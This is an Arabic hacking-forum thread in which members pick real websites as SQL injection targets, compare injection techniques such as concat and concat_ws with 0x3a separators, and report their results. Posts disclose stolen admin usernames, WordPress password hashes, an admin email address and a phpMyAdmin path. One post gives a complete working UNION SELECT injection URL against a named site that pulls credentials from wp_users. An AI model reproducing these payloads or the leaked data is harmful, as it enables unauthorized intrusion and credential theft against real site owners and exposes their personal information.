![]() |
[align=center]الهدف الجديد : http://www.touringcartimes.com/news.php?id=4311 هذا اعتقد راح يكون ممل شوي لذلك راح اضيف هدف ثاني معاه للي ما قدر يحقن الاول يحقن الثاني الهدف الثاني : http://www.vfs.com/news.php?id=7&news_id=362 بالتوفيق تحياتي [/align] |
عبد الله ر يعطيك الصحة أخي العزيز جاري تقييمك على العمل اللذي تقوم به |
Master vbspiders جاري بعد العودة في الليل بإذن الله |
[align=center]شكرا أخي على المواقع تم الحقن و لكن لدي ما أقوله لا أعرف لماذا لا يمكن حقنهما يدويا لأن عدد الأعمدة لا ينتهي يظهر كأن الثغرة مرقعة في الموقع الأول و لكن من خلال البرنامج يمكن حقنه و هذه معلومات الموقع الأول : الأدمن : admin الباسوارد : $P$BfX83P0hDuIl3OXTM.44dGAATde1bB. نوع التشفيرة : MD5/UNIX و تقريبا هذا النوع يمكنك فكه من خلال التخمين أقصد من خلال البرامج مثل PasswordPro لأنو لا توجد مواقع لفك هذا النوع من الهاش ( لم أرى بنفسي موقع يفعل هذا ) إيميل الأدمن : rob.veltman@touringcartimes.com phpmyadmin : http://www.touringcartimes.com/phpmyadmin/ بالنسبة للموقع الثاني هناك حماية على السيرفر و لا أعرف كيف تمكنت أنت من حقنه بالتوفيق[/align] |
اقتباس:
الرمز 0x3a هو عبارة عن فاصلة لكن عندما تضيف 0x3a3a تصبح فاصلتين و هكذا exemple concat(id,0x3a,passs) resultat admin:admin mais si vous ajoutez 0x3a3a concat(id,0x3a3a,passs) resultat admin::admin بخصوص الاستعلام concat_ws هو نفسه concat لكن بدل ما نكتب الفاصلة 0x3a وسط الاستغلال نضع _ws و الفاصلة في البداية c'est t-a dire concat_ws(0x3a,id,user,parola) هي نفسها concat(id,0x3a,user,0x3a,parola) الى الأمام دائما....^_^ |
اقتباس:
[align=center]اعتذر هذه المرة وضعت المواقع وخرجت بدون التاكد بانها صالحة للحقن... + بالنسبة لوضع الاهداف انا اعتذر عن هذه المهمة تقدر من الان انت والاخوة ان تحددو الاهداف الجديدة تحياتي [/align] |
هذا أجمل شئ سمعته هذا اليوم. |
m0h@med شكرا أخي m0h@med على التوضيح و الله أفدتني بخصوص concat_ws كثيرا وكذلك رمز الفاصلتين يعني أحسن مانكتب 0x3a مرتين نكتبها 0x3a3a |
اقتباس:
|
الهدف الجديد كود: www.imagesfestival.com |
تم تقييم كل من الإخوة Master vbspiders m0h@med Syst3m-32 عبد الله ر smilies12 :a04: |
اقتباس:
أخي الكريم هل حقنت أنت هذا الموقع ؟؟؟ لأنو إصدار القاعدة 4 و خمنت أكثر من 600 إسم للجدول و لا جدوى إن كنت لم تحقنه يا غالي فتذكر ما قلنا لازم قبل أن نضع هدف أن نحقنه ليس موقع لم نستطع حقنه نضعه، لأنو ممكن عضو جديد ما يقدر يحقن فيكره ال SQL لكن لما نكون حقناه نعطيه الحل و يستفيد |
حقنتو يا غالي Syst3m-32 ويدويا |
اقتباس:
ولو هذا واجبنا بالنسبة للموقع : www.imagesfestival.com والله انا حاولت اخمن اسم الجدول بس ما طلع معي مع انني جربت كتتتتتيييير.....هههه بس والله من رأي انك تضع جدول التخمين اللي بتشتغل انت عليه او الطريقة التي تستعملها ليستفاد منها الجميع ولكن بعد ان يحاول الجميع فيه ويجرب الكل عليه بالاول مشكور على التقييم بالنسبة للأخ Syst3m-32 ياريت تقلنا بأي برنامج حقنت الموقع لاني بصراحة ما جربت استعمل اي برنامج للحقن قبل الان الشي الوحيد اللي احيانا بستعملو هو شريط الهاك للفايرفوكس مشان الامر union select اذا كان عدد الاعمدة كتير ومشان تشفير كلمة %pass% فقط ومن اجل ان اعرف القليل عن فائدة هذه البرامج وكيف تساعد في الاختراق مشكووووور |
يا دارك لوول ليش ما قلت لي أنه WordPress ؟؟؟ جعلتني أظهر كأنني لم أستطع حقن الموقع لوول تم الحقن بنجاح بعد معرفة السكربت WordPress لوول إسم الجدول : wp_users إسم عمود اليوزر : user_login إسم عمود الباسوارد : user_pass يوزر الأدمن : admin باسوارده : $P$BKVumgDn3YBBmuENaVRIHGq9yEV1QN1 بالمناسبة الباسوارد مشفر تشفيرة MD5-WordPress و هذه الحقنة كاملة : كود: http://www.imagesfestival.com/volunteer.php?id=-6%20UNION%20SELECT%201,2,concat%28user_login,0x3a,user_pass%29,4,5,6,7,8+from+wp_users-- بالتوفيق |
الساعة الآن 12:21 PM |
[ vBspiders.Com Network ]